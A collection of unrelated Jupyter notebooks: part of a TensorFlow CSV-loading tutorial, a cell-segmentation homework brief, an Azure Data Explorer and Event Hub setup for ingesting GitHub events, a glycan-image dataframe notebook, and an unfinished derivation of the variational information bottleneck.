plt.axis('off')
```
## Lower level functions
So far this tutorial has focused on the highest level utilities for reading csv data. There are other two APIs that may be helpful for advanced users if your use-case doesn't fit the basic patterns.
* `tf.io.decode_csv` - a function for parsing lines of text into a list of CSV column tensors.
* `tf.data.experimental.CsvDataset` - a lower level csv dataset constructor.
This section recreates functionality provided by `make_csv_dataset`, to demonstrate how this lower level functionality can be used.
### `tf.io.decode_csv`
This function decodes a string, or list of strings into a list of columns.
Unlike `make_csv_dataset` this function does not try to guess column data-types. You specify the column types by providing a list of `record_defaults` containing a value of the correct type, for each column.
To read the Titanic data **as strings** using `decode_csv` you would say:
```
text = pathlib.Path(titanic_file_path).read_text()
lines = text.split('\n')[1:-1]
all_strings = [str()]*10
all_strings
features = tf.io.decode_csv(lines, record_defaults=all_strings)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
```
To parse them with their actual types, create a list of `record_defaults` of the corresponding types:
```
print(lines[0])
titanic_types = [int(), str(), float(), int(), int(), float(), str(), str(), str(), str()]
titanic_types
features = tf.io.decode_csv(lines, record_defaults=titanic_types)
for f in features:
print(f"type: {f.dtype.name}, shape: {f.shape}")
```
Note: it is more efficient to call `decode_csv` on large batches of lines than on individual lines of csv text.
### `tf.data.experimental.CsvDataset`
The `tf.data.experimental.CsvDataset` class provides a minimal CSV `Dataset` interface without the convenience features of the `make_csv_dataset` function: column header parsing, column type-inference, automatic shuffling, file interleaving.
This constructor follows uses `record_defaults` the same way as `io.parse_csv`:
```
simple_titanic = tf.data.experimental.CsvDataset(titanic_file_path, record_defaults=titanic_types, header=True)
for example in simple_titanic.take(1):
print([e.numpy() for e in example])
```
The above code is basically equivalent to:
```
def decode_titanic_line(line):
return tf.io.decode_csv(line, titanic_types)
manual_titanic = (
# Load the lines of text
tf.data.TextLineDataset(titanic_file_path)
# Skip the header row.
.skip(1)
# Decode the line.
.map(decode_titanic_line)
)
for example in manual_titanic.take(1):
print([e.numpy() for e in example])
```
#### Multiple files
To parse the fonts dataset using `experimental.CsvDataset`, you first need to determine the column types for the `record_defaults`. Start by inspecting the first row of one file:
```
font_line = pathlib.Path(font_csvs[0]).read_text().splitlines()[1]
print(font_line)
```
Only the first two fields are strings, the rest are ints or floats, and you can get the total number of features by counting the commas:
```
num_font_features = font_line.count(',')+1
font_column_types = [str(), str()] + [float()]*(num_font_features-2)
```
The `CsvDatasaet` constructor can take a list of input files, but reads them sequentially. The first file in the list of CSVs is `AGENCY.csv`:
```
font_csvs[0]
```
So when you pass pass the list of files to `CsvDataaset` the records from `AGENCY.csv` are read first:
```
simple_font_ds = tf.data.experimental.CsvDataset(
font_csvs,
record_defaults=font_column_types,
header=True)
for row in simple_font_ds.take(10):
print(row[0].numpy())
```
To interleave multiple files, use `Dataset.interleave`.
Here's an initial dataset that contains the csv file names:
```
font_files = tf.data.Dataset.list_files("fonts/*.csv")
```
This shuffles the file names each epoch:
```
print('Epoch 1:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
print()
print('Epoch 2:')
for f in list(font_files)[:5]:
print(" ", f.numpy())
print(' ...')
```
The `interleave` method takes a `map_func` that creates a child-`Dataset` for each element of the parent-`Dataset`.
Here, you want to create a `CsvDataset` from each element of the dataset of files:
```
def make_font_csv_ds(path):
return tf.data.experimental.CsvDataset(
path,
record_defaults=font_column_types,
header=True)
```
The `Dataset` returned by interleave returns elements by cycling over a number of the child-`Dataset`s. Note, below, how the dataset cycles over `cycle_length)=3` three font files:
```
font_rows = font_files.interleave(make_font_csv_ds,
cycle_length=3)
fonts_dict = {'font_name':[], 'character':[]}
for row in font_rows.take(10):
fonts_dict['font_name'].append(row[0].numpy().decode())
fonts_dict['character'].append(chr(row[2].numpy()))
pd.DataFrame(fonts_dict)
```
#### Performance
Earlier, it was noted that `io.decode_csv` is more efficient when run on a batch of strings.
It is possible to take advantage of this fact, when using large batch sizes, to improve CSV loading performance (but try [caching](#caching) first).
With the built-in loader 20, 2048-example batches take about 17s.
```
BATCH_SIZE=2048
fonts_ds = tf.data.experimental.make_csv_dataset(
file_pattern = "fonts/*.csv",
batch_size=BATCH_SIZE, num_epochs=1,
num_parallel_reads=100)
%%time
for i,batch in enumerate(fonts_ds.take(20)):
print('.',end='')
print()
```
Passing **batches of text lines** to`decode_csv` runs faster, in about 5s:
```
fonts_files = tf.data.Dataset.list_files("fonts/*.csv")
fonts_lines = fonts_files.interleave(
lambda fname:tf.data.TextLineDataset(fname).skip(1),
cycle_length=100).batch(BATCH_SIZE)
fonts_fast = fonts_lines.map(lambda x: tf.io.decode_csv(x, record_defaults=font_column_types))
%%time
for i,batch in enumerate(fonts_fast.take(20)):
print('.',end='')
print()
```
For another example of increasing csv performance by using large batches see the [overfit and underfit tutorial](../keras/overfit_and_underfit.ipynb).
This sort of approach may work, but consider other options like `cache` and `snapshot`, or re-enncoding your data into a more streamlined format.
| github_jupyter |
## Neural networks for segmentation
```
! wget https://www.dropbox.com/s/jy34yowcf85ydba/data.zip?dl=0 -O data.zip
! unzip -q data.zip
```
Your next task is to train neural network to segment cells edges.
Here is an example of input data with corresponding ground truth:
```
import scipy as sp
import scipy.misc
import matplotlib.pyplot as plt
import numpy as np
import skimage.io
import skimage
%matplotlib inline
# Human HT29 colon-cancer cells
plt.figure(figsize=(10,8))
plt.subplot(1,2,1)
im = skimage.img_as_ubyte(skimage.io.imread('BBBC018_v1_images-fixed/train/00735-actin.DIB.bmp'))
plt.imshow(im)
plt.subplot(1,2,2)
mask = skimage.img_as_ubyte(skimage.io.imread('BBBC018_v1_outlines/train/00735-cells.png'))
plt.imshow(mask, 'gray')
```
This time you aren't provided with any code snippets, just input data and target metric - intersection-over-union (IoU) (see implementation below).
You should train neural network to predict mask of edge pixels (pixels in gt images with value greater than 0).
Use everything you've learnt by now:
* any architectures for semantic segmentation (encoder-decoder like or based on dilated convolutions)
* data augmentation (you will need that since train set consists of just 41 images)
* fine-tuning
You're not allowed to do only one thing: to train you network on test set.
Your final solution will consist of an ipython notebook with code (for final network training + any experiments with data) and an archive with png images with network predictions for test images (one-channel images, 0 - for non-edge pixels, any non-zero value for edge pixels).
Forestalling questions about baseline... well, let's say that a good network should be able to segment images with iou >= 0.29. This is not a strict criterion of full points solution, but try to obtain better numbers.
Practical notes:
* There is a hard data class imbalance in dataset, so the network output will be biased toward "zero" class. You can either tune the minimal probability threshold for "edge" class, or add class weights to increase the cost of edge pixels in optimized loss.
* Dataset is small so actively use data augmentation: rotations, flip, random contrast and brightness
* Better spend time on experiments with neural network than on postprocessing tricks (i.e test set augmentation).
* Keep in mind that network architecture defines receptive field of pixel. If the size of network input is smaller than receptive field of output pixel, than probably you can throw some layers without loss of quality. It is ok to modify "of-the-shelf" architectures.
Good luck!
```
def calc_iou(prediction, ground_truth):
n_images = len(prediction)
intersection, union = 0, 0
for i in range(n_images):
intersection += np.logical_and(prediction[i] > 0, ground_truth[i] > 0).astype(np.float32).sum()
union += np.logical_or(prediction[i] > 0, ground_truth[i] > 0).astype(np.float32).sum()
return float(intersection) / union
```
| github_jupyter |
## 1. Get and Set Azure Credentials
```
!az login
!az ad sp create-for-rbac --sdk-auth > mycredentials.json
import os, json
with open('mycredentials.json') as data_file:
azure_session = json.load(data_file)
# delete credentials file
os.remove("mycredentials.json")
```
## 2. Create Azure Resource Manager Client
```
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentMode
credentials = ServicePrincipalCredentials(
client_id=azure_session["clientId"],
secret=azure_session["clientSecret"],
tenant=azure_session["tenantId"]
)
client = ResourceManagementClient(credentials, azure_session["subscriptionId"])
```
## 3. Resource Group Parameters
```
RESOURCE_GROUP_NAME = 'kustodeploymenttest' # Set resource group name here
AZURE_REGION = 'East US' # Set region here
location = ''.join(AZURE_REGION.split()).lower()
```
## 4. Azure Data Explorer Cluster Parameters
```
CLUSTER_NAME = 'cdacluster'
CLUSTER_NODE_SIZE = 'D13_v2'
CLUSTER_NODE_TEIR = 'Standard'
CLUSTER_NODE_CAPACITY = 2
```
## 5. Set Azure Data Explorer DB Deployment Parameters
```
DB_NAME = 'cdadb'
DB_SOFT_DELETION_PERIOD = 3650
DB_HOT_CACHE_PERIOD = 31
URI = "https://{}.{}.kusto.windows.net:443".format(CLUSTER_NAME, location)
DATA_INGESTION_URI = "https://ingest-{}.{}.kusto.windows.net:443/".format(CLUSTER_NAME, location)
```
## 6. Define Azure Data Explorer Deployment Template
```
template = {\
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [\
{\
"type": "Microsoft.Kusto/Clusters",
"sku": {\
"name": CLUSTER_NODE_SIZE,
"tier": CLUSTER_NODE_TEIR,
"capacity": CLUSTER_NODE_CAPACITY
},
"name": CLUSTER_NAME,
"apiVersion": "2017-09-07-privatepreview",
"location": AZURE_REGION,
"properties": {\
"trustedExternalTenants": [
{
"value": azure_session["tenantId"]
}
],
}
},
{\
"type": "Microsoft.Kusto/Clusters/Databases",
"name": "{}/{}".format(CLUSTER_NAME, DB_NAME),
"apiVersion": "2017-09-07-privatepreview",
"location": AZURE_REGION,
"properties": {
"softDeletePeriodInDays": DB_SOFT_DELETION_PERIOD,
"hotCachePeriodInDays": DB_HOT_CACHE_PERIOD,
},
"dependsOn": [\
"[resourceId('Microsoft.Kusto/Clusters', '{}')]".format(CLUSTER_NAME)
]
}
]
}
deployment_properties = {
'mode': DeploymentMode.incremental,
'template': template,
}
```
## 7. Create Resource Group and Deploy
Note this could take 10-15 min and is not necessary if you've run the last notebook
```
resource_group_params = {'location':location}
client.resource_groups.create_or_update('kustodeploymenttest', resource_group_params)
# https://docs.microsoft.com/en-us/python/api/azure-mgmt-resource/azure.mgmt.resource.resources.v2018_05_01.operations.deploymentsoperations?view=azure-python#create-or-update
deployment_async_operation = client.deployments.create_or_update(
RESOURCE_GROUP_NAME,
'azure-sample',
deployment_properties
)
deployment_async_operation.wait()
```
## 8. Install Kusto Ingestion Libraries for Stream Ingestion
```
# Install Perquisite Libraries
!pip install azure-kusto-data==0.0.13
!pip install azure-kusto-ingest==0.0.13
```
## 9. Create Kusto Client
```
from azure.kusto.data.request import KustoClient, KustoConnectionStringBuilder
from azure.kusto.data.exceptions import KustoServiceError
from azure.kusto.data.helpers import dataframe_from_result_table
import pandas as pd
import datetime
KCSB_ENGINE = KustoConnectionStringBuilder.with_aad_application_key_authentication(URI,
azure_session["clientId"],
azure_session["clientSecret"],
azure_session["tenantId"])
KUSTO_CLIENT = KustoClient(KCSB_ENGINE)
```
## 10. Create a Table Called Github Event to hold our data
```
CREATE_TABLE_COMMAND = ".create table GithubEvent ( Id:int64, Type: string, Actor: dynamic, Repo: dynamic, Payload: dynamic, Public:bool, CreatedAt: datetime)"
RESPONSE = KUSTO_CLIENT.execute_mgmt(DB_NAME, CREATE_TABLE_COMMAND)
dataframe_from_result_table(RESPONSE.primary_results[0])
```
## 11. Create ingestion Mapping from for ingesting events from EventHub
```
CREATE_MAPPING_COMMAND = """.create table GithubEvent ingestion json mapping "GitMapping" '[{"column":"Id","path":"$.id"},{"column":"Type","path":"$.type"},{"column":"Actor","path":"$.actor"},{"column":"Repo","path":"$.repo"},{"column":"Payload","path":"$.payload"},{"column":"Public","path":"$.public"},{"column":"CreatedAt","path":"$.created_at"}]'"""
RESPONSE = KUSTO_CLIENT.execute_mgmt(DB_NAME, CREATE_MAPPING_COMMAND)
dataframe_from_result_table(RESPONSE.primary_results[0])
```
## 11. Create Event Hub using the Azure CLI to Ingest All Github Events
```
# Create an Event Hubs namespace. Specify a name for the Event Hubs namespace.
!az eventhubs namespace create --name 'kusto-github-EHNS' --resource-group 'kustodeploymenttest' -l 'East US'
# Create an event hub. Specify a name for the event hub.
!az eventhubs eventhub create --name 'kusto-github-EH' --resource-group 'kustodeploymenttest' --namespace-name 'kusto-github-EHNS'
```
### Create a EH User and Key for Github Ingestion
```
!az eventhubs eventhub authorization-rule create --eventhub-name 'kusto-github-EH'\
--name 'kusto-github-EH-key'\
--namespace-name 'kusto-github-EHNS'\
--resource-group 'kustodeploymenttest'\
--rights 'Send'
```
## 12. Use ARM to link the new EventHub with our Cluster
```
template = { \
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
{
"type":"Microsoft.Kusto/clusters/databases/eventhubconnections",
"name":"{}/{}/{}".format(CLUSTER_NAME, DB_NAME, 'github'),
"apiVersion":"2018-09-07-preview",
"location": AZURE_REGION,
"properties":{
"consumerGroup":"$Default",
"eventHubResourceId":"[resourceId('Microsoft.EventHub/namespaces/eventhubs', 'kusto-github-EHNS', 'kusto-github-EH')]",
"tableName":"GithubEvent",
"mappingRuleName":"GitMapping",
"dataFormat":"JSON"
}
}
]
}
deployment_properties = {
'mode': DeploymentMode.incremental,
'template': template,
}
# https://docs.microsoft.com/en-us/python/api/azure-mgmt-resource/azure.mgmt.resource.resources.v2018_05_01.operations.deploymentsoperations?view=azure-python#create-or-update
deployment_async_operation = client.deployments.create_or_update(
RESOURCE_GROUP_NAME,
'azure-sample',
deployment_properties
)
deployment_async_operation.wait()
```
## 13. Use the Azure CLI to create an container instance to ingest all the github events into our EventHub
You'll need a github developer token you can get one for free from using [these instructions](https://github.blog/2013-05-16-personal-api-tokens/).
### Get EH Key
```
!az eventhubs eventhub authorization-rule keys list --resource-group 'kustodeploymenttest' --namespace-name 'kusto-github-EHNS' --eventhub-name 'kusto-github-EH' --name 'kusto-github-EH-key'
```
### Run CLI Command
To get the from github to eventhub I've created the following python ingestion scripts that run on alpine docker checkout the code [here](https://github.com/aribornstein/github2eventhub) this can be reused new projects.
```
!az container create -g kustodeploymenttest --name gh2eh --image abornst/gh2eh --cpu 1 --memory 1 \
--environment-variables "eh_address"="amqps://kusto-github-EHNS.servicebus.windows.net/kusto-github-EH"\
"eh_user"="kusto-github-EH-key" "eh_key"="primaryKey see above" \
"gh_token"="GitHub Token See instructions above"
```
## 14. Lets start seeing how many events we've pulled from Github let's give it ~5-20min to populate
```
QUERY = "GithubEvent | count"
RESPONSE = KUSTO_CLIENT.execute_query(DB_NAME, QUERY)
dataframe_from_result_table(RESPONSE.primary_results[0])
```
## 15. Now That we have our Data Let's try some interesting queries and use pandas and matplotlib to plot them.
### What are the 5 most popular Repos on Github?
```
QUERY = """let watchedRepos =
GithubEvent
| where Type == "WatchEvent"
| extend RepoName = tostring(Repo.name)
| summarize hint.shufflekey=RepoName WatchEvents=count() by RepoName;
let issuesRepos =
GithubEvent
| where Type in ("IssueCommentEvent", "IssuesEvent")
| extend RepoName = tostring(Repo.name)
| summarize hint.shufflekey=RepoName IssueEvents=count() by RepoName;
watchedRepos
| join hint.shufflekey=RepoName (issuesRepos) on RepoName
| extend Popularity=(WatchEvents * 0.3) + (IssueEvents*0.7)
| top 5 by Popularity
| project RepoName, Popularity """
RESPONSE = KUSTO_CLIENT.execute_query(DB_NAME, QUERY)
dataframe_from_result_table(RESPONSE.primary_results[0]).plot.bar(x='RepoName')
```
# Challenge
Use the service and [query langauge](https://docs.microsoft.com/azure/kusto/query/?WT.mc_id=code-github-abornst) to find the following and tweet your results to @pythiccoder
- What are the most popular programming langauges of the last year (by watch events)?
- What is the sentiment over time of the top 10 programming languages on Github?
- Who are the top most active users by country?
- Who are the github users with the most contributions to the top 50 most popular repos?
| github_jupyter |
# dataframe of glycan images
Lazily create a dataframe containing the images for all the glycans in array v 5.0.
This may be usefulfor analysis later.
```
%reset -f
## import all required dependencies
# standard imports
import urllib2
import os
import sys
import json
import StringIO
import pickle
# dataframe and numerical
import pandas as pd
import numpy as np
# plotting
import matplotlib.pyplot as plt
%matplotlib inline
# plotting params
from matplotlib import rcParams
rcParams["figure.figsize"] = 10, 8
#scipy
from scipy import stats
from scipy.special import erf
from scipy import sqrt
# glypy
import glypy
from glypy.plot import plot
from glypy.io import glycoct
# other modules
sys.path.append('../scripts/')
import post_glycan_convert as pgc
# Use an example array - using the galectin example
samples_in="../data/galectin-3/galectin-3_5.0_human.json"
results_dir = "../results/galectin-3/"
dataframe_out=results_dir+"dataframes_galectin.pkl"
dataframefile=dataframe_out
# Check whether or not the dataframes exist
subdir="./"
dataframefile=dataframe_out
if not os.path.isfile(dataframefile):
print "calling the notebook that loads the data"
%run download_cfg_for_galectin.ipynb
with open(os.path.join(subdir, dataframefile)) as f:
dataframes = pickle.load(f)
dataframes[0]["sample"]
frame=dataframes[0]["dataframe"]
frame.head()
# create a data frame with the glycan and the spacer as separate columns
Structure="Structure on Masterlist"
df=pd.concat([frame["Chart Number"], frame[Structure]], axis=1)
df.head()
#frame["Structure"]
df[Structure].str.extract('(.*-)')
df["Glycan"]=df[Structure].str.extract('(.*-)').str.strip('-')
#df['Structure'].str.extract('(-Sp.+?$)')
df["Spacer"]=df[Structure].str.split('.*-').str[1]
df
# create a function that plots using glypy
def plotter(func):
"""
A decorator that plots the function .
(it actually just prints it, but it could be logging!)
"""
def wrapper(*args, **kwargs):
res = func(*args, **kwargs)
#print func.__name__, args, kwargs
#plot(res,label=True)
return res
return wrapper
@plotter
def get_gly_iupac(iupacstring):
try:
kchandle = StringIO.StringIO(iupacstring)
kcf=pgc.mechanise_glycan_convert(kchandle, "Kcf", "text")
kchandle2 = StringIO.StringIO(kcf)
gct=pgc.mechanise_glycan_convert(kchandle2, "Glycoct", "text")
return glycoct.loads(gct)
except:
return iupacstring
high_binders_from_paper=[372,
543,
545,
547,
549,
550,
551,
565,
566,
569,
576,
577,
578,
579,
580,
581,
582,
583,
584,
585,
586,
587,
588,
589]
highbinders_df = df[df["Chart Number"].isin(high_binders_from_paper)]
#highbinders_df["glycoct"]=get_gly_iupac(highbinders_df["Glycan"])
highbinders_df["glycoct"]=highbinders_df["Glycan"]
highbinders_df.head()
highbinders_df
highbinders_df["glycoct"]=highbinders_df["Glycan"]
# create a function called to http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# maps apply to the showl frame....
def map_glycoct(x):
# that, if x is a string,
return get_gly_iupac(x)
#. commenting out for now as takes a while. plus not all conversions occur
#newslice = highbinders_df['glycoct'].map(map_glycoct) # http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# Not always able to get iupac-> kcf-> glycoct
# why not just pull imaged from kcf-> image
import post_kcf_to_image as pki
def get_gly_image(iupacstring):
try:
kchandle = StringIO.StringIO(iupacstring)
kcf=pgc.mechanise_glycan_convert(kchandle, "Kcf", "text")
kchandle2 = StringIO.StringIO(kcf)
gct=pki.post_rings_kcf_to_image(kchandle2)
return pki.get_first_image_from_html(gct).encode("base64")
except:
return iupacstring
aimg= get_gly_image(df["Glycan"][372])
from IPython.display import Image
Image(aimg)
highbinders_from_analysis={543,
547,
549,
550,
551,
565,
566,
569,
577,
578,
579,
580,
581,
582,
588,
589}
import urllib
highbinders2_df = df[df["Chart Number"].isin(highbinders_from_analysis)]
highbinders2_df["Image"]=highbinders2_df["Glycan"]
# create a function called to http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# maps apply to the showl frame....
def map_image(x):
# that, if x is a string,
return '<html><img src="data:image/png;base64,'+urllib.quote(get_gly_image(x).rstrip('\n'))+'"/></html>'
#return '<html><img src="data:image/png;base64,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"/></html>'
newslice = highbinders2_df['Image'].map(map_image) # http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
pd.set_option('display.max_colwidth', 10000)
from IPython.display import Image, HTML
newslice
HTML(newslice.to_frame().to_html(escape=False))
def get_gly_kcf(iupacstring):
try:
kchandle = StringIO.StringIO(iupacstring)
kcf=pgc.mechanise_glycan_convert(kchandle, "Kcf", "text")
return kcf
except:
return iupacstring
highbinders2_df["KCF"]=highbinders2_df["Glycan"]
# create a function called to http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
# maps apply to the showl frame....
def map_kcf(x):
# that, if x is a string,
return get_gly_kcf(x)
newslice2 = highbinders2_df['KCF'].map(map_kcf) # http://chrisalbon.com/python/pandas_apply_operations_to_dataframes.html
kcfdict=newslice2.to_dict()
kcfdict.keys()
kcflist=[]
for key in kcfdict:
kcflist.append(kcfdict[key])
print "".join(kcflist) # can paste this into http://rings.t.soka.ac.jp/cgi-bin/tools/MCAW/mcaw_index.pl
```
| github_jupyter |
# VIB: Theory
**Notation**
* $x$ be our input source,
* $y$ be our target
* $z$ be our latent representation
### Mutual Information
Mutual information (MI) measures the amount of information obtained about one random variable after observing another random variable. Formally given two random variables $x$ and $y$ with joint distribution $p(x,y)$ and marginal densities $p(x)$ and $p(y)$ their MI is defined as the KL-divergence between the joint density and the product of their marginal densities
$$\begin{align}
I(x;y)&=I(y;x)\\
&=KL\Big(p(x,y)||p(x)p(y)\Big)\\
&=\mathbb{E}_{(x,y)\sim p(x,y)}\bigg[\log\frac{p(x,y)}{p(x)p(y)}\bigg]\\
&=\int dxdyp(x,y)\log\frac{p(x,y)}{p(x)p(y)}
\end{align}$$
### Information Bottlenecks
IB regards supervised learning as a representation learning problem, seeking a stochastic map from input data
$x$ to some latent representation $z$ that can still be used to predict the labels $y$ , under a constraint on its total complexity.
We assume our joint distribution $p(x,y,z)$ can be factorised as follows:
$$p(x,y,z)=p(z\mid x,y)p(y\mid x)p(x)=p(z\mid x)p(y\mid x)p(x)$$
which corresponds to the following Markov Chain
$$y\rightarrow x\rightarrow z$$
Our goal is to learn an encoding that is maximally informative about our target $y$ measured by $I(y;z)$. We could always ensure a maximally informative representation by taking the identity encoding $x=z$ which is not useful. Instead we apply a constraint such that the objective is
$$\begin{alignat}{3}
&\underset{}{\text{max }} & \quad & I(y;z)\\
&\text{subject to } & \quad & I(x;z)\leq I_c
\end{alignat}$$
where $I_c$ is the information constraint. The Lagrangian of the above constrained optimisation problem which we would like to **maximise** is
$$\begin{align}
L_{IB}&=I(y;z)-\beta \big(I(x;z)-I_c\big)\\
&=I(y;z)-\beta I(x;z)
\end{align}$$
where $\beta\geq0$ is a Lagrange multiplier.
* Intuitively the first term encourages $z$ to be predictive of $y$, whilst the second term encourages $z$ to "forget" $x$.
* In essence, IB principle explicitly enforces the learned representation $z$ to only preserve the information in $x$ that is useful to the prediction of $y$, i.e., the minimal sufficient statistics of $x$ w.r.t. $y$.
### Variational Information Bottlenecks
**The first term**<br>
We can write out the terms in the objective as
$$I(y;z)=\int dydz p(y,z)\log \frac{p(y,z)}{p(y)p(z)}=\int dydz p(y,z)\log \frac{p(y\mid z)}{p(y)}$$
where $p(y\mid z)$ is defined as
$$p(y\mid z)=\int dx \frac{p(x,y,z)}{p(z)}=\int dx \frac{p(z\mid x)p(y\mid x)p(x)}{p(z)}$$
which is intractable. Let $q(y\mid z)$ be a variational approximation to $p(y\mid z)$. By using the KL divergence we can obtain a lower bound on $I(y;z)$
$$KL\Big(p(y\mid z)|| q(y\mid z)\Big)\geq0\Longrightarrow \int dy p(y\mid z)\log p(y\mid z)\geq \int dy p(y\mid z)\log q(y\mid z)$$
Hence we have that
$$\begin{align}
I(y;z)&= \int dydz p(y,z)\log p(y\mid z) - \int dy p(y)\log p(y)\\
&\geq \int dydz p(y, z)\log q(y\mid z) - \int dy p(y)\log p(y)\\
&=\int dxdydz p(z\mid x)p(y\mid x)p(x)\log q(y\mid z)
\end{align}$$
where the entropy of the labels $H(y)=- \int dy p(y)\log p(y)$ is independent of our optimisation and so can be ignored.
**The second term**<br>
We can write out the second term in the objective as
$$I(x;z)=\int dxdz p(x,z)\log \frac{p(x,z)}{p(x)p(z)}=\int dxdz p(x,z)\log \frac{p(z\mid x)}{p(z)}$$
Let $q(z)$ be a variational approximation to the marginal $p(z)$. By using the KL divergence we can obtain an upper bound on $I(x;z)$ as
$$KL\Big(p(z)|| q(z)\Big)\geq0\Longrightarrow \int dz p(z)\log p(z)\geq \int dz p(z)\log q(z)$$
Hence we have
$$\begin{align}
I(x;z)&=\int dxdz p(x,z)\log p(z\mid x) - \int dz p(z)\log p(z)\\
&\leq\int dxdz p(x,z)\log p(z\mid x) - \int dz p(z)\log q(z)\\
&=\int dxdz p(x)p(z\mid x)\log \frac{p(z\mid x)}{q(z)}
\end{align}$$
### Loss Function
Combining the above two bounds we can rewrite the Lagrangian which we would like to **maximise** as
$$\begin{align}
L_{IB}&=I(y;z)-\beta I(x;z)\\
&\geq \int dxdydz p(z\mid x)p(y\mid x)p(x)\log q(y\mid z) -\beta\int dxdz p(x)p(z\mid x)\log \frac{p(z\mid x)}{q(z)}\\
&=\int dxdydz p(z\mid x)p(y,x)\log q(y\mid z) -\beta\int dxdydz p(z\mid x)p(x,y)KL\Big(p(z\mid x)||q(z)\Big)\\
&=\mathbb{E}_{(x,y)\sim p(x,y), z\sim p(z\mid x)}\bigg[\log q(y\mid z)-\beta KL\Big(p(z\mid x)||q(z)\Big)\bigg]\\
&=J_{IB}
\end{align}$$
To compute the lower bound in practice make the following assumptions:
